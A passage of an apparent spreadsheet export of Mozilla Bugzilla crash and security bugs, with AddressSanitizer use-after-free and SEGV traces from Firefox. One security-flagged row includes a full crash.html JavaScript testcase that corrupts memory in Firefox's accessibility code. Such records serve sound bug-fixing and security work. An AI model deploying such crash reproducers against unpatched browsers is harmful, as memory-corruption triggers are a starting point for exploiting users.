        #9 0x7faef5089eff in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7464
        #10 0x7faef508d423 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7622:9
        #11 0x7faef502347d in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::GCReason) /builds/worker/workspace/build/src/js/src/gc/GC.cpp:7710:3
        #12 0x7faeef978f39 in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:2325:5
        #13 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #14 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #15 0x7faee8e01e40 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
        #16 0x7faee8d2e5b2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #17 0x7faee8d2e5b2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #18 0x7faee8d2e5b2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #19 0x7faee7db12fa in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
        #20 0x7faf0884e05d in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:201:5
        #21 0x7faf084946b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    previously allocated by thread T22 (DOM Worker) here:
        #0 0x55c5c6461503 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
        #1 0x55c5c6495f9d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
        #2 0x7faeefd8af22 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
        #3 0x7faeefd8af22 in mozilla::dom::XMLHttpRequestWorker::Construct(mozilla::dom::GlobalObject const&amp;, mozilla::dom::MozXMLHttpRequestParameters const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestWorker.cpp:1482
        #4 0x7faeefd8a049 in mozilla::dom::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::MozXMLHttpRequestParameters const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequest.cpp:51:10
        #5 0x7faeecffb4f7 in mozilla::dom::XMLHttpRequest_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:2557:64
        #6 0x7faef4007905 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
        #7 0x7faef4007905 in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
        #8 0x7faef4007905 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
        #9 0x7faef3fe4f1c in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3063:16
        #10 0x7faef3fced88 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
        #11 0x7faef4009ef9 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
        #12 0x7faef400a66c in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:814:10
        #13 0x7faef4287694 in bool Evaluate&lt;char16_t&gt;(JSContext*, js::ScopeKind, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;char16_t&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:539:10
        #14 0x7faef4286a0a in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceText&lt;char16_t&gt;&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:557:10
        #15 0x7faeef98a456 in mozilla::dom::(anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:1989:10
        #16 0x7faeef9c9f82 in mozilla::dom::WorkerRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerRunnable.cpp:363:12
        #17 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #18 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #19 0x7faeef9b904e in mozilla::dom::WorkerPrivate::RunCurrentSyncLoop() /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:3646:7
        #20 0x7faeef95b555 in Run /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.h:1169:27
        #21 0x7faeef95b555 in mozilla::dom::(anonymous namespace)::LoadAllScripts(mozilla::dom::WorkerPrivate*, nsTArray&lt;mozilla::dom::(anonymous namespace)::ScriptLoadInfo&gt;&amp;, bool, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:2149
        #22 0x7faeef95a972 in mozilla::dom::workerinternals::LoadMainScript(mozilla::dom::WorkerPrivate*, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerScriptType, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/ScriptLoader.cpp:2259:3
        #23 0x7faeef9dd1c5 in mozilla::dom::(anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:340:5
        #24 0x7faeef9c9f82 in mozilla::dom::WorkerRunnable::Run() /builds/worker/workspace/build/src/dom/workers/WorkerRunnable.cpp:363:12
        #25 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #26 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #27 0x7faeef9b07ea in mozilla::dom::WorkerPrivate::DoRunLoop(JSContext*) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2748:7
        #28 0x7faeef978f0b in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:2305:40
        #29 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #30 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #31 0x7faee8e01e40 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:333:5
        #32 0x7faee8d2e5b2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #33 0x7faee8d2e5b2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #34 0x7faee8d2e5b2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #35 0x7faee7db12fa in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:454:11
    Thread T22 (DOM Worker) created by T0 (Web Content) here:
        #0 0x55c5c6449add in pthread_create /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
        #1 0x7faf08840158 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:433:14
        #2 0x7faf08829d3e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:518:12
        #3 0x7faee7db3609 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:661:8
        #4 0x7faeef9d9388 in mozilla::dom::WorkerThread::Create(mozilla::dom::WorkerThreadFriendKey const&amp;) /builds/worker/workspace/build/src/dom/workers/WorkerThread.cpp:93:7
        #5 0x7faeef94df79 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker(mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:1433:14
        #6 0x7faeef94c595 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker(mozilla::dom::WorkerPrivate*) /builds/worker/workspace/build/src/dom/workers/RuntimeService.cpp:1298:19
        #7 0x7faeef9aa8a3 in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerType, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/WorkerPrivate.cpp:2250:24
        #8 0x7faeef95c7b7 in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/workers/Worker.cpp:30:41
        #9 0x7faeecfab3d0 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WorkerBinding.cpp:1112:52
        #10 0x7faef4007905 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
        #11 0x7faef4007905 in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
        #12 0x7faef4007905 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
        #13 0x7faef3fe4f1c in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3063:16
        #14 0x7faef3fced88 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
        #15 0x7faef4009ef9 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:781:13
        #16 0x7faef400a66c in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:814:10
        #17 0x7faef428491d in ExecuteScript(JSContext*, JS::Handle&lt;JS::StackGCVector&lt;JSObject*, js::TempAllocPolicy&gt; &gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/CompilationAndEvaluation.cpp:455:10
        #18 0x7faeeb5b26a4 in nsJSUtils::ExecutionContext::ExecScript() /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:386:8
        #19 0x7faeefe21ef3 in mozilla::dom::ExecuteCompiledScript(JSContext*, mozilla::dom::ScriptLoadRequest*, nsJSUtils::ExecutionContext&amp;) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2495:16
        #20 0x7faeefe1efb1 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2715:20
        #21 0x7faeefe1794c in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2222:10
        #22 0x7faeefe14322 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1803:10
        #23 0x7faeefdee73e in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1526:10
        #24 0x7faeefdeda0e in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:118:18
        #25 0x7faeea1249ba in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:224:18
        #26 0x7faeea1249ba in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:727
        #27 0x7faeea11e663 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:530:7
        #28 0x7faeea12a7e0 in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:133:18
        #29 0x7faee7d86141 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
        #30 0x7faee7db73a1 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
        #31 0x7faee7dbd4b8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
        #32 0x7faee8e00c3a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
        #33 0x7faee8d2e5b2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #34 0x7faee8d2e5b2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #35 0x7faee8d2e5b2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #36 0x7faef0180599 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
        #37 0x7faef3d7bc9f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
        #38 0x7faee8d2e5b2 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
        #39 0x7faee8d2e5b2 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
        #40 0x7faee8d2e5b2 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
        #41 0x7faef3d7b646 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
        #42 0x55c5c64943a7 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
        #43 0x55c5c64943a7 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
        #44 0x7faf0743682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
    SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:331:7 in ~nsCOMPtr_base
    Shadow bytes around the buggy address:
      0x0c2480012050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c2480012060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c2480012070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c2480012080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2480012090: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
    =&gt;0x0c24800120a0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
      0x0c24800120b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c24800120c0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
      0x0c24800120d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c24800120e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c24800120f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7061==ABORTING</t>
        </is>
      </c>
      <c r="X309" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" t="n">
        <v>527567</v>
      </c>
      <c r="B310" t="inlineStr">
        <is>
          <t>2009-11-09 14:51:42 -0800</t>
        </is>
      </c>
      <c r="C310" t="inlineStr">
        <is>
          <t>Crash @ [@nsCOMPtr_base::assign_from_qi(nsQueryInterface, nsID const&amp;) ]</t>
        </is>
      </c>
      <c r="D310" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:49 -0700</t>
        </is>
      </c>
      <c r="E310" t="n">
        <v>1</v>
      </c>
      <c r="F310" t="n">
        <v>1</v>
      </c>
      <c r="G310" t="n">
        <v>3</v>
      </c>
      <c r="H310" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I310" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J310" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K310" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L310" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M310" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N310" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O310" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P310" t="inlineStr">
        <is>
          <t>[crashkill][sg:dupe 528134]</t>
        </is>
      </c>
      <c r="Q310" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R310" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S310" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T310" t="n">
        <v>1</v>
      </c>
      <c r="U310" t="n">
        <v>0</v>
      </c>
      <c r="V310" t="n">
        <v>24</v>
      </c>
      <c r="W310" t="inlineStr">
        <is>
          <t>Currently #40 of the TopCrash Stats 
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;version=Firefox%3A3.6b1&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=nsCOMPtr_base%3A%3Aassign_from_qi%28nsQueryInterface%2C%20nsID%20const%26%29
other then "Google PageSpeed plugin crashed when analysing a page" no other steps to reproduce mentioned - investigating</t>
        </is>
      </c>
      <c r="X310" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" t="n">
        <v>1280387</v>
      </c>
      <c r="B311" t="inlineStr">
        <is>
          <t>2016-06-16 02:42:10 -0700</t>
        </is>
      </c>
      <c r="C311" t="inlineStr">
        <is>
          <t>SEGV in mozilla::a11y::HyperTextAccessible::GetChildOffset</t>
        </is>
      </c>
      <c r="D311" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:26 -0700</t>
        </is>
      </c>
      <c r="E311" t="n">
        <v>1</v>
      </c>
      <c r="F311" t="n">
        <v>1</v>
      </c>
      <c r="G311" t="n">
        <v>3</v>
      </c>
      <c r="H311" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I311" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J311" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K311" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M311" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N311" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O311" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P311" t="inlineStr">
        <is>
          <t>[adv-main49+]fixed by bug 1286598; latent until bug 1255009</t>
        </is>
      </c>
      <c r="Q311" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R311" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S311" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T311" t="n">
        <v>1</v>
      </c>
      <c r="U311" t="n">
        <v>0</v>
      </c>
      <c r="V311" t="n">
        <v>26</v>
      </c>
      <c r="W311" t="inlineStr">
        <is>
          <t>The testcase crashes the latest asan build of Firefox (BuildID=20160613161626) as follows.
crash.html:
&lt;script&gt;
var c=0;
function start() {
        o0=document;
        o8=document.documentElement;
        o0.designMode='on';
        o187=document.createElement('iframe');
        o8.appendChild(o187);
        o195=document.createElement('iframe');
        o195.addEventListener('load', f1, false);
        o260=document.createElement('frame');
        o273=o187.contentWindow;
        o274=o273.document;
        t=o274.getElementsByTagName('*');
        o276=t[0];
        o276.appendChild(o195);
        document.replaceChild(o274.documentElement,document.documentElement);
        o490=document.createElement('frameset');
        o490.setAttribute('cols','*,*,*,1%,*,*,77,8,*,-81920,*,');
        document.body=o490;
        o490.appendChild(o260);
        o561=document.createElement('frame');
        o562=document.createElement('frame');
        o640=document.documentElement;
        o490.appendChild(o561);
}
function f1() {
        if(c++==0) {
                o761=document.body;
                window.top.document.body=o761;
                o0.removeChild(o640);
                o0.appendChild(o640);
                window.top.setTimeout(f2, 4);
        } else {
                window.top.document.body=o490;
                o490.appendChild(o562);
                window.setTimeout("location.reload()",10);
        }
}
function f2() {
        o260.appendChild(o561);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN:SIGSEGV
=================================================================
==21316==ERROR: AddressSanitizer: SEGV on unknown address 0x60240020b990 (pc 0x7f4ea01050ff sp 0x7fffa5ea0490 bp 0x7fffa5ea04d0 T0)
    #0 0x7f4ea01050fe in mozilla::a11y::HyperTextAccessible::GetChildOffset(unsigned int, bool) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/generic/HyperTextAccessible.cpp:2035
    #1 0x7f4ea008c3c8 in AsHyperText /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/generic/HyperTextAccessible.h:266
    #2 0x7f4ea008c3c8 in mozilla::a11y::EventTree::Mutated(mozilla::a11y::AccMutationEvent*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/base/EventTree.cpp:521
    #3 0x7f4ea0089421 in mozilla::a11y::EventTree::Shown(mozilla::a11y::Accessible*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/base/EventTree.h:68
    #4 0x7f4ea008910d in mozilla::a11y::TreeMutation::AfterInsertion(mozilla::a11y::Accessible*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/base/EventTree.cpp:113
    #5 0x7f4ea011d80f in mozilla::a11y::DocAccessible::ProcessContentInserted(mozilla::a11y::Accessible*, nsTArray&lt;nsCOMPtr&lt;nsIContent&gt; &gt; const*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/generic/DocAccessible.cpp:1792
    #6 0x7f4ea00976cc in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/accessible/base/NotificationController.cpp:233
    #7 0x7f4e9ef62b5f in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:1712
    #8 0x7f4e9ef70bfb in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:251
    #9 0x7f4e9ef707e0 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:270
    #10 0x7f4e9ef6fcc4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsRefreshDriver.cpp:430
    #11 0x7f4e9f8c5060 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/ipc/VsyncChild.cpp:64
    #12 0x7f4e995d132a in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:240
    #13 0x7f4e990cf981 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1963
    #14 0x7f4e99003303 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1658
    #15 0x7f4e9900005a in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1596
    #16 0x7f4e98fed185 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1563
    #17 0x7f4e990131b0 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:722
    #18 0x7f4e990131b0 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:728
    #19 0x7f4e990131b0 in nsRunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:756
    #20 0x7f4e99013c7f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:476
    #21 0x7f4e99013c7f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:495
    #22 0x7f4e9826c7c4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1029
    #23 0x7f4e982e76aa in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #24 0x7f4e9900a82e in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:100
    #25 0x7f4e98f793fc in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #26 0x7f4e98f793fc in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #27 0x7f4e98f793fc in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #28 0x7f4e9e8e1617 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #29 0x7f4ea0965732 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:826
    #30 0x7f4e98f793fc in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #31 0x7f4e98f793fc in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #32 0x7f4e98f793fc in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #33 0x7f4ea0964e2c in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:656
